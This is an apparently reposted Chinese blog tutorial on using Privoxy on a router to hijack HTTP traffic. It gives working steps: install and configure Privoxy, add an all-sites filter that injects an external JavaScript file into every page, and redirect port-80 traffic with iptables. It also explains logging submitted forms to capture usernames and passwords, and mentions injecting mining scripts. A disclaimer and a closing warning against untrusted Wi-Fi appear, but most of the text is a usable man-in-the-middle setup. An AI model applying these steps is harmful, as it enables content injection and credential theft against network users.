利用privoxy劫持http网站数据,插入广告,获取用户名,密码

内容预览:
  • 通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理co...~
  • 可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行~
  • &;-来自百度百科 privoxy功能很强大,可以用来过滤广告,那么我们也可以用...~

看了几篇privoxy的文章,感觉讲的都不详细,在此整理一遍。

注:本文下面的内容仅讨论思路,作为技术交流之用,请勿用作非法途径.

Privoxy是一款带过滤功能的代理服务器,针对HTTP、HTTPS协议。通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理cookies,以及拦阻各种广告等。Privoxy可以用作单机,也可以应用到多用户的网络。

Privoxy基于Internet Junkbuster,按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行。

—-来自百度百科

privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利….

先上图..

环境:免费的K3刷官改版.

刷完系统后 安装 privoxy

命令:

opkg install privoxy

然后编辑 config 文件

vi /tmp/media/nand/opt/etc/privoxy/config

修改listen-address 为如下形式

listen-address  192.168.2.1:8118
accept-intercepted-requests 1

192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口

action 文件

vi /tmp/media/nand/opt/etc/privoxy/user.action

加入以下内容 代表拦截所有网址

+filter}
.*

filter文件

vi /tmp/media/nand/opt/etc/privoxy/user.filter

FILTER: ad Add ad
s||http://www.abc.com/ad.js"> $0|g

很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.

这里只分析一下原理,就不放示例代码了… 相信各位大神,都会的….

最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口

iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118

最后的效果就是第一张图…所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿…

privoxy功能不只是修改网页内容,还可以记录访问记录..

甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..

修改config中的debug级别即可…(默认的日志只记录请求的url.)

至于privoxy还能干嘛,大家自己发挥吧…

所以,,这告诉我们一个道理,不要随便连接陌生wifi…要连接也要尽量访问https网站..

和大佬一起学习网络安全知识

以上就是:利用privoxy劫持http网站数据,插入广告,获取用户名,密码 的全部内容

本站部分内容来源于互联网和用户投稿,如有侵权请联系我们删除,谢谢^^
Email:[email protected]


0 条回复 A 作者 M 管理员
    所有的伟大,都源于一个勇敢的开始!
欢迎您,新朋友,感谢参与互动!欢迎您 {{author}},您在本站有{{commentsCount}}条评论